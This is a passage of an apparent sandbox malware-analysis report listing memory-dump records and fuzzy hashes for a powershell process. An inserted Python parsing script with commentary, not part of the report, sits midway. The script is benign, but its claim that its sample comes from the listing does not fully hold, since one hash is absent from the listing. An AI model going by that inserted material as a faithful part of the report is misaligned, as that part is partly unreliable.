                                                                                                                                                                                                                          • Instruction ID: dafc0519cb48b89af9e9248df27534d4ffd4417ad78883593db1e7816ae5fc31
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eed4bb176188e785cd42e755b6f6cbd896409b4475b154f5f14c963c4f96a03a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6212476608700EFDB09DF10D9C0B16BB65FB8C314F24C5ADEA090A256C3B6C457CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1554698961.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_31fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d8fd4a4fb3f7bdbab2b518a6fcd5c8cb4b1f040ca906e5842fa643e9c15ea119
                                                                                                                                                                                                                          • Instruction ID: 58b2678cf6e7d040fc8aed79205f30b3641f2a3499faff938ce6ad0323652af3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8fd4a4fb3f7bdbab2b518a6fcd5c8cb4b1f040ca906e5842fa643e9c15ea119
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99213775604304DFDB14DF10D9C4B16BB66FB88324F24C5ADDA094B282C3B6D447CB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f1b877c7b29fff990868be7e04d7ec9223e6cccf5d7a0e3c0355cb4e85d0afe3
                                                                                                                                                                                                                          • Instruction ID: 80b7c4e6297824d56ad762360c2d6032d4908d4aa9b05100c4c73ce3710acf97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b877c7b29fff990868be7e04d7ec9223e6cccf5d7a0e3c0355cb4e85d0afe3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E32157B49057448EEB60CF6AD48838AFBF2EF88324F28C41AD85D97206DB7464818B61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 73f78e330cb73d2c3c54dfa1b501b9bc0de32b9f66756ab54774b9690a0e2c94
                                                                                                                                                                                                                          • Instruction ID: 37ed0d9436b3b8900e990dc97758f23384e7e70a748fdbeac98a48918b4912e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73f78e330cb73d2c3c54dfa1b501b9bc0de32b9f66756ab54774b9690a0e2c94
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D211FE3A7001188FDB04DFA8D840A9DB7F6EFCC665B0540A5E909DB355DB31ED158BA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8bf56feb46dfca2ba2823840572cd4e32b77c703659c2310ae2b7e0bf7e19030
                                                                                                                                                                                                                          • Instruction ID: 78cf014386aa23c55df902592c049e63fadc0b06bacbfcfad6cdc0463f311b03
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf56feb46dfca2ba2823840572cd4e32b77c703659c2310ae2b7e0bf7e19030
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28114835B002049BCB11DB74EC158EDFFB1EF88320B10A466E559E7351DB316C178BA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1554698961.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_31fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 05050efde7f80e2bacd3aed6f2bd0425f272660e14b98707f66944896a751249
                                                                                                                                                                                                                          • Instruction ID: 1e91b26b975868f22cb9ce8a8f91a7f36e5eba1f7f8cf90a913fea94c42b62f4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05050efde7f80e2bacd3aed6f2bd0425f272660e14b98707f66944896a751249
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421CD76508644DFCF06CF10D9C0B16BF72FB88314F28C5A9DA494A666C37AD46ACF91
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d8672ecc0805e3f3560d0d59ab235ea12afb9a2670557b094c7e0fe848cc49d2
                                                                                                                                                                                                                          • Instruction ID: e00c399b2637bc33d77a48c7f0a0dfec05eecdf894b45ee9f27f1124b4282d3b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8672ecc0805e3f3560d0d59ab235ea12afb9a2670557b094c7e0fe848cc49d2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2301F5317002109BC7069B6DEC108DEBBAADFC9271714806BE909D7340EB61A90687E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1554698961.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_31fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bb2c615d30f077614c2f6e701b51ce97adb4e7859af34b9b872f5e3f8473804e
                                                                                                                                                                                                                          • Instruction ID: 3776b51f8db34a86d3d22ae801c414c1a7be0298bdb7676896f97504eed456ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb2c615d30f077614c2f6e701b51ce97adb4e7859af34b9b872f5e3f8473804e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D11BB79604280CFCB11CF14D5C0B15BFA2FB88324F28C6AAD9494B696C37AD44ACB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fa3a30747c90d942b436026ea22e015a4dfd4a9805f8690b1666ffb536a8ada6
                                                                                                                                                                                                                          • Instruction ID: b66572241c423e9884a296706aa7cb11691cf21cd2356134cc1c611e9a5d06cb
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f2c5a7bbbc693d182e3c3f6d83abb168ea800039ca19f99a99af9535cec06729
                                                                                                                                                                                                                          • Instruction ID: 6f86b3a057dc2722b16053f791a5e4753137216c75e10473b89e9601e289d0f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2c5a7bbbc693d182e3c3f6d83abb168ea800039ca19f99a99af9535cec06729
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF0A7317007149FD7149B59E844A6F77E9EBCC675B10092DE509D3740DF74AC028BA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 049232fed0693e972cc822d0e4d1228fc6df7cfa2617540a63ee5ff0e214bf39
                                                                                                                                                                                                                          • Instruction ID: a1cb41f51e911c57fc430d760986434f96a63f1a7674b4b296471d20b37cb20b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 049232fed0693e972cc822d0e4d1228fc6df7cfa2617540a63ee5ff0e214bf39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F0E5393002088FDB04EBBCD840A9AB7E2FFCC6657094558EA09CB314DF30EC018BA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 176f5965f9781bbfd59c1b82ca70e97ad95d2a6cf0f4cfadea7db98e2e5a8864
                                                                                                                                                                                                                          • Instruction ID: 6caa146f6851b3f11ebdf31223f02255536ffb0ee1418391edc9b8d0566396e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 176f5965f9781bbfd59c1b82ca70e97ad95d2a6cf0f4cfadea7db98e2e5a8864
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F02775604624DBE304AF68C00879BB7A6EFC5324F10816AC6194B384CE3A7801CBE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 45f8dde0bc5f544203c5030ed87e864265ab05758ada26b5770c95e474b33d03
                                                                                                                                                                                                                          • Instruction ID: d6cd946a02440b3f14a1e3c1177dd1bb28b7878abcdca5fece4954e39c06dc22
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45f8dde0bc5f544203c5030ed87e864265ab05758ada26b5770c95e474b33d03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0B4709093118FD7609B78D49C396BFB1FF41310F00485AE199C7241DB382941C790
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d40f105cdf0790f9cd35f63e8d7c17dbf20f49ae2c317b33f396a99222d88017
                                                                                                                                                                                                                          • Instruction ID: 6de76c8a1e2bf13cb5f9526ce13bbd2b81f06c289f60bba57f0b3d9148a17d3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d40f105cdf0790f9cd35f63e8d7c17dbf20f49ae2c317b33f396a99222d88017
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E0D862F052311BA74077A9580456A6B8DEFD6A79B1122B39915CB381ED14FC0953B2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 751ab0ff8de5ec8a275396287aaec7b24f9b32fabe404847b0ccea89525b89a1
                                                                                                                                                                                                                          • Instruction ID: 7504198e54b3979a16a3cd900a3e16cf5a909ed733a799cf28287c8e85ec638f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 751ab0ff8de5ec8a275396287aaec7b24f9b32fabe404847b0ccea89525b89a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E0E5353002158F87149B1DD898C26B7FAEFCEA2932910A9F549DB725DA61EC018B90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4a828669a24218b17c8749de6ea1dfaa2ee6dd1863dc70e1dc414da34253ba72
                                                                                                                                                                                                                          • Instruction ID: b5d8961f2c429325bf8e712e5337995e72c1cdc53dbd3b55f0595f917b13fcb7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a828669a24218b17c8749de6ea1dfaa2ee6dd1863dc70e1dc414da34253ba72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF0E5357093A28FCB0A2774981C2AE7F66FFC5325F04009BE6158B282CF682D06C395
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1bd867a344b7438123aece3ce51e589c63f890559fe65b66b4032f00465612df
                                                                                                                                                                                                                          • Instruction ID: cec08cb31c205fee0a1ad0b680f2cc5b6d17eb08722ea0b4d2154796e757682d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bd867a344b7438123aece3ce51e589c63f890559fe65b66b4032f00465612df
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E0D8213083920B8B16972DA85045ABB77DFC723031854B7F480CF342EE1198018395
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 68998c333e85401327d1cfc10d2b2f3e233b7f8104a6c07ea6dfb2313403a0a3
                                                                                                                                                                                                                          • Instruction ID: 4a246776aaee6ede1014122c3f1f8dbc6a8f41b0db44d9233eb00397c957a079
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68998c333e85401327d1cfc10d2b2f3e233b7f8104a6c07ea6dfb2313403a0a3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F06D709003148FD760DF78D89C39ABBE5FB44360F004929D61EC7240DB396880CB90
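The records in this listing are raw analyzer output, and reading hundreds of them by eye is impractical. The following Python script is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself: it parses records in exactly the layout shown above into dicts, cross-checks the dump base address that appears in three places (the 4th dot-separated field of the .sdmp name, the Offset field, and the hex field of the hcaresult_ snapshot name), collects the Opcode Fuzzy Hashes per memory dump so they can be pivoted on, and confirms two things visible in every record here: Opcode ID repeats Opcode Fuzzy Hash, and API ID, String ID and API String ID are blank. The embedded sample is constructed from two of the process-5 (powershell) records above; what the first two numbers of the hcaresult_ name encode is an assumption and is labelled as such in the code.

```python
# Added example (not part of the Joe Sandbox report): parse the per-function
# records of this listing into dicts, cross-check the dump base address that
# appears in three places, and collect the fuzzy hashes per memory dump.
import re
from collections import defaultdict

# Constructed sample: two records in the page's own layout, values taken from
# the process-5 (powershell) records of this listing.
SAMPLE = """\
Memory Dump Source
• Source File: 00000005.00000002.1554698961.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_31fd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1d380033a8237c47324ecbd714348b13cc0ba3c4feb6dadd26e14e35e4d7dd8
• Instruction ID: 451c9e8be20028175ef5f07e3fe50f6a90d0ece7cbf76d35508abdcc20813578
• Opcode Fuzzy Hash: e1d380033a8237c47324ecbd714348b13cc0ba3c4feb6dadd26e14e35e4d7dd8
• Instruction Fuzzy Hash: 26F0F976100A40AFD765CF06DD85D23BBB9FBC9664B198499E85A4B312C771FC42CF60
Memory Dump Source
• Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f2c5a7bbbc693d182e3c3f6d83abb168ea800039ca19f99a99af9535cec06729
• Instruction ID: 6f86b3a057dc2722b16053f791a5e4753137216c75e10473b89e9601e289d0f7
• Opcode Fuzzy Hash: f2c5a7bbbc693d182e3c3f6d83abb168ea800039ca19f99a99af9535cec06729
• Instruction Fuzzy Hash: DFF0A7317007149FD7149B59E844A6F77E9EBCC675B10092DE509D3740DF74AC028BA0
"""

SOURCE_RE = re.compile(r"^(?P<file>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
# hcaresult_<n>_<m>_<base>_<image>.jbxd: <base> is the dump base address (it
# matches 'Offset' on the page); what <n> and <m> encode is an assumption here.
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$")


def parse_records(text):
    """Split at each 'Memory Dump Source' header; return one {field: value} dict per record."""
    records = []
    for chunk in re.split(r"^Memory Dump Source[ \t]*$", text, flags=re.M):
        fields = {}
        for line in chunk.splitlines():
            line = line.strip().lstrip("•").strip()
            if ":" in line:  # skip sub-headers such as 'Similarity'
                key, _, value = line.partition(":")
                fields[key.strip()] = value.strip()
        if "Source File" in fields:  # drops text before the first header and truncated fragments
            records.append(fields)
    return records


def decode_source(record):
    """Parse the Source File line and check that the base address agrees across
    the .sdmp name (4th dot field), the Offset field and the snapshot name."""
    m = SOURCE_RE.match(record["Source File"])
    if m is None:
        raise ValueError("unexpected Source File line: %r" % record["Source File"])
    offset = int(m["offset"], 16)
    base_in_sdmp = int(m["file"].split(".")[3], 16)
    snap = SNAPSHOT_RE.match(record.get("Snapshot File", ""))
    base_in_snap = int(snap.group(3), 16) if snap else None
    return {
        "sdmp": m["file"],
        "offset": offset,
        "based_on_pe": m["pe"] == "true",
        "process": snap.group(4) if snap else None,
        "consistent": offset == base_in_sdmp == base_in_snap,
    }


def hashes_by_dump(records):
    """Map each .sdmp file to the set of Opcode Fuzzy Hashes lifted from it."""
    out = defaultdict(set)
    for r in records:
        out[r["Source File"].split(",")[0]].add(r["Opcode Fuzzy Hash"])
    return dict(out)


def opcode_id_matches_fuzzy_hash(records):
    """On this page every record's Opcode ID repeats its Opcode Fuzzy Hash; verify that."""
    return all(r.get("Opcode ID") == r.get("Opcode Fuzzy Hash") for r in records)


def always_empty_fields(records, keys=("API ID", "String ID", "API String ID")):
    """Similarity fields that are blank in every record (no API or string match recorded)."""
    return [k for k in keys if all(r.get(k, "") == "" for r in records)]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print([decode_source(r) for r in recs])
    print(hashes_by_dump(recs), always_empty_fields(recs))
```

To run it over the whole listing, paste the report text in place of SAMPLE; records whose header falls outside the pasted text (like the fragment at the top of this page) are dropped rather than misattributed, and a record whose three base-address fields disagree is flagged with consistent=False so it can be inspected by hand.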
Memory Dump Source
• Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5493e034e1854044042dab2e4d6557fc75e5564cf067784c7a29fb858a58897f
• Instruction ID: 442ced9810d775e64833dee3be3577a174dd8ddc3c0714166bee84a030ca4326
• Opcode Fuzzy Hash: 5493e034e1854044042dab2e4d6557fc75e5564cf067784c7a29fb858a58897f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32E0863570462597CB093779A81C2AE7F5AFBC8725F04052AD71687380CF7D790283D9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d8745ef515c7156cc51787536d9fd5a1b162e8be1454c7a63d584cea5d120890
                                                                                                                                                                                                                          • Instruction ID: 31a3d1c275bcf4d2fce700d2849e9fcbaa8d26634e289422e7a9043904beff22
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8745ef515c7156cc51787536d9fd5a1b162e8be1454c7a63d584cea5d120890
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FD05E52F051350B6A5436AA18046BBA9CEEFC64B972620B79A05DB242EC44FC0A03F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction ID: fe1b5640831345531659b9413aee9621a724b7500c5e4aaf8d2962b6c9bdff34
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BE08631B0001497CB089559D8108DDF7AADFCC220F04907AD90AA7340DA32691587E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e423b9e5a0390accafe49c1c23d8318fba784352fd4aa2865a30d6bb60de3729
                                                                                                                                                                                                                          • Instruction ID: 45fb41afc94dfd0c0fe076f1fe22221c08dd773f7c586739de97425f98b39cbe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e423b9e5a0390accafe49c1c23d8318fba784352fd4aa2865a30d6bb60de3729
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17E08C35300B104B8216A66EA80089EBB9ADFC95B6310842AE51A9B300DF68EC0247AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8a81ea784d75239312df7dd7c9a0641eb1fcf4d066b7eebbc7da56f9e28bfe75
                                                                                                                                                                                                                          • Instruction ID: 9e61364ddaef0c4da2fc3a8fb49945908a2ebb36db8bf07ec976a5a6e97e4d3f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a81ea784d75239312df7dd7c9a0641eb1fcf4d066b7eebbc7da56f9e28bfe75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92E04F3480421BCBCB09EFA4E44A4ADFF30FF24301B0001A9E946C3290EB301956CFC5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c1f07b0db481733b86782aa8c6be167040b26a62855d4764b55c23d6687b632c
                                                                                                                                                                                                                          • Instruction ID: 80d68f64f1fd3cdf76bedc0f15c9f9eda9384adfea5fc137a8aa60d1ded810b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1f07b0db481733b86782aa8c6be167040b26a62855d4764b55c23d6687b632c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8E01A70D0424A9F9B80EFA88841599FBF4EB59200F2081AAC918D7201E6329A12CFC1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
